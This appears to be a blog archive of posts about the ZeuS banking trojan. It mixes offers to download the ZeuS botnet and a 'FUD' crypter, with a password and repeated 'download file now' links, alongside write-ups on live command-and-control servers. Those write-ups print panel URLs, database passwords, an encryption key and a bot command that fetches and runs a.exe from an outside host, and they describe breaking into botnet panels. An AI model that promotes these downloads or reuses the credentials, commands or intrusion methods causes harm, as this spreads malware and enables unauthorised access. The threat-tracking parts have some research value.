Posts

Showing posts with the label zeus

ZEUS BOTNET DOWNLOAD

Image
ZEUS BOTNET DOWNLOAD zeus botnet is one of the badass trajan banker it use TDS ( traffic direction system ) to spread  powerfull tool with lots of upgrades and nice control panel download now  pass: zeus download  file  now

ZeuS Botnet aticiinsaat org

Image
ZeuS Botnet aticiinsaat org ZeuS 2.0.8.9 banking trojan botnet hosted on aticiinsaat.org - 159.253.36.219 (Turkey) aticiinsaat.org. 8878 IN A 159.253.36.219 Domain Name:ATICIINSAAT.ORG Domain ID: D171358345-LROR Creation Date: 2014-03-11T11:26:47Z Updated Date: 2014-05-11T03:46:02Z Registry Expiry Date: 2015-03-11T11:26:47Z Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR) inetnum:        159.253.36.0 - 159.253.36.255 remarks:        INFRA-AW netname:        NETINTERNET Admin login:   Home: 70 bots (many CN, mixed world installs) 13k reports OS Stats: We still see WinXP as top OS, however Win7 and Win7 64bit are catching up. This machine had another ZeuS/Citadel on it as well. You can see it calling home to the gate.php (This botnet is offline now too) Example of banking credentials being stolen from a victim. Note the HTTPS in the url. TLS/SSL does not help here. ZeuS malware has hooked the brows...

ZeuS hosted on masabe7 com

Image
ZeuS hosted on masabe7 com ZeuS 2.1.0.1 C&C hosted on: masabe7.com 205.251.135.234 network:ID:8.205.251.128.0/19 network:Auth-Area:205.251.128.0/19 network:Network-Name:WHB-COLO-5 network:IP-Network:205.251.135.0/24 network:Organization;I:WEBHOSTINGBUZZ.COM network:Tech-Contact;I:engineering@gnax.net 519 bots (315 from India) hxxp://masabe7.com/powede/cp.php?m=login Summary:  OS Statistics: Now its 403 Forbidden Good stuff. download  file  now

ZeuS 2 1 0 1 inlandbeardeddragons com

ZeuS 2 1 0 1 inlandbeardeddragons com Found C&C via ZeuS Tracker. Panel was at: hxxp://inlandbeardeddragons.com/templates/beez/.ama/cp.php?m=login 46 bots config $config[mysql_host] = localhost; $config[mysql_user] = inlandbe_ama; $config[mysql_pass] = 1qaz2wsx; $config[mysql_db] = inlandbe_ama; Running script: user_execute http://eyecatchersoptique.com/images/.stnfrn/server/a.exe Admin was moving bots to ZeuS 2.9.6.1 This is from the same admins researched here. a.exe https://www.virustotal.com/en/file/cac8ede4d09c2728f12421b6648da204e5a84561ebf3d9012fe39e0aa83a56fb/analysis/1389472180/ https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/ download  file  now

ZeuS C C via Google Dorks and tracking ZeuS Admins biterelish co za

Image
ZeuS C C via Google Dorks and tracking ZeuS Admins biterelish co za Over the weekend I found some ZeuS C&Cs using Google. Most command and control servers found using dorks are offline now, but not all. This one was still active and getting larger. I had an idea to "patch" cp.php so that I could track the guys who admin this. ZeuS C&C biterelish.co.za 207.45.186.26 Uname: Linux serve16.serve-hosting.net 2.6.18-448.16.1.el5.lve0.8.70PAE CIDR:           207.45.176.0/20 OriginAS:       AS36444, AS2828 NetName:        ACENETMI 3x ZeuS botnets hosted: Summary: (357 bots) OS Statistics: Search for Files: Summary page from last week, showing 331 bots. Options & Encryption Key: Monkey@Bannana123!!! named botnets: vti, will, txt hxxp://biterelish.co.za/txt/cp.php?m=home (RU language set on Panel) 32 bots, Active since Aug 2013 (txt) $config[mysql_host] = localhost; $config[mysql_user] = bitereli_biterel; $config[mysql_p...

Zeus Crypter 2013

Image
Zeus Crypter 2013 download zeus cryper update 2013/2/23- FUD binder DOWNLOADER download now download  file  now

ZeuS Citadel KINS

Image
ZeuS Citadel KINS Hacking botnet panels on ZeusTracker  https://zeustracker.abuse.ch/monitor.php?host=wio.es https://zeustracker.abuse.ch/monitor.php?host=167.88.15.203 https://zeustracker.abuse.ch/monitor.php?host=culifeup.com download  file  now

ZeuS Banking Trojan Botnet

Image
ZeuS Banking Trojan Botnet ZeuS Banking Trojan C&C Server kopolonimu.info 62.76.188.139 Estimated Size:  500+ bots (small)  Targeting: UA and RU some of the banks being targeted: privatbank.ua dnbbank.ru URL listing on Cyber Crime Tracker WHOIS details on the host network inetnum:        62.76.176.0 - 62.76.191.255 netname:       Clodo-Cloud descr:            IT House, Ltd person:          Maxim Dyubarev address:        Kalyazinskaya,7, Saint-Petersburg, Russia, 194017 route:             62.76.184.0/21 descr:            IT House, Ltd origin:            AS57010 mnt-by:          ROSNIIROS-MNT (no abuse email address)    Some info from VirusTotal I forgot to take a screenshot of the auth page. I went back and checked today and the server ...

ZeuS botnet powdereddoughnut com

Image
ZeuS botnet powdereddoughnut com More work on the ZeuS Tracker C&Cs  powdereddoughnut.com - hosting small ZeuS botnet 199.204.248.103  - JumpLine, US, Ohio Domain has Whois protection Targets include VN and AE .gov sites POP3 and HTTP credentials, no banking credentials seen Config f8e2d5d42364f80332c7661dd5fbe4a3 ZeuS C&C login: breaking... Summary: 42 bots - why you so shitty and small? OS Statistics to show what systems get hit. note: Win7 x64 Someone left a sandy sea shell on your sea shore... Shared hosting - wtf, really?  $ uname -a Linux cpanel03.myhostcenter.com 2.6.32-358.6.2.el6.x86_64 #1 SMP Thu May 16 20:59:36 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux $ id uid=33351(powdered) gid=33355(powdered) groups=33355(powdered) bot_uninstall Reported abuse to: postmaster( a t )myhostcenter.com compliance( a t ) opensrs.org download  file  now

ZeuS XAT Loader

Image
ZeuS XAT Loader ZeuS panel with halloween theme. Overview: Stat OS: Bots: Scripts: Search in database: Search in files: System infos: Options: User: Users: And XAT Loader I dont know what is this but that sound like HF Stuff. Interface in Spanish... no sense, ZeuS was in russian. Thanks Anon. download  file  now